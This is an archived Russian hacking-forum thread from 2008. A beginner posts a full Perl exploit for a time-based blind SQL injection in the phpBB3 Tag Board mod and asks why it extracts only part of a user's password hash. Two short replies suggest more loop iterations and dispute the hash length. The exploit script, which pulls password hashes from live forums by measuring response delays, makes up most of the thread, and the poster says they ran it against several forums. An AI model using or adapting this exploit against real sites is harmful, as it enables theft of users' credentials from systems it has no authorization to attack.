Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Эксплоит. Почему добывается не весь хеш?

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Для начинающих] >> Эксплоит. Почему добывается не весь хеш?
Имя
Сообщение << Старые топики   Новые топики >>
Эксплоит. Почему добывается не весь хеш? - 2008-12-21 23:48:03.760000   
vidden

Сообщений: 3
Оценки: 0
Присоединился: 2008-12-21 23:43:38.540000
привет. есть эксплоит для phpbb такого вида:

#!/usr/bin/perl # --------------------------------------------------------------- # phpBB 3 (Mod Tag Board &lt;= 4) Remote Blind SQL Injection Exploit # by athos - staker[at]hotmail[dot]it # http://bx67212.netsons.org/forum/viewforum.php?f=3 # --------------------------------------------------------------- # Note: Works regardless PHP.ini settings! # Thanks meh also know as cHoBi # --------------------------------------------------------------- use strict; use LWP::UserAgent; my ($hash,$time1,$time2); my @chars = (48..57, 97..102); my $http = new LWP::UserAgent; my $host = shift; my $table = shift; my $myid = shift or &usage; sub injection { my ($sub,$char) = @_; return "/tag_board.php?mode=controlpanel&action=delete&id=". "1+and+(select+if((ascii(substring(user_password,${sub},1)". ")=${char}),benchmark(230000000,char(0)),0)+from+${table}_us". "ers+where+user_id=${myid})--"; } sub usage { print STDOUT "Usage: perl $0 [host] [table_prefix] [user_id]\n"; print STDOUT "Howto: perl $0 http://localhost/phpBB phpbb 2\n"; print STDOUT "by athos - staker[at]hotmail[dot]it\n"; exit; } syswrite(STDOUT,'Hash MD5: '); for my $i(1..33) { for my $j(0..16) { $time1 = time(); $http-&gt;get($host.injection($i,$chars[$j])); $time2 = time(); if($time2 - $time1 &gt; 6) { syswrite(STDOUT,chr($chars[$j])); $hash .= chr($chars[$j]); last; } if($i == 1 && length $hash &lt; 0) { syswrite(STDOUT,"Exploit Failed!\n"); exit; } } }
при попытке добыть md5 хеш, добывает только 9-11 знаков. почему? как решить проблему и достать 16 значный хеш? пробовал на нескольких форумах, везде одинаково
Post #: 1
RE: Эксплоит. Почему добывается не весь хеш? - 2008-12-22 15:55:31.936666   
Denisska05

Сообщений: 661
Оценки: 0
Присоединился: 2007-06-26 20:21:10.883333
Может попробовать в цикле записи хеша сделать больше интераций?
Post #: 2
RE: Эксплоит. Почему добывается не весь хеш? - 2008-12-22 19:26:13.346666   
gromoza2

Сообщений: 170
Оценки: 0
Присоединился: 2008-08-27 22:27:24.110000
quote:

при попытке добыть md5 хеш, добывает только 9-11 знаков. почему? как решить проблему и достать 16 значный хеш?

Первый раз слышу, что в md5 16 знаков! 16 знаков это MySQL хеши.
Post #: 3
Страниц:  [1]
Все форумы >> [Для начинающих] >> Эксплоит. Почему добывается не весь хеш?







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.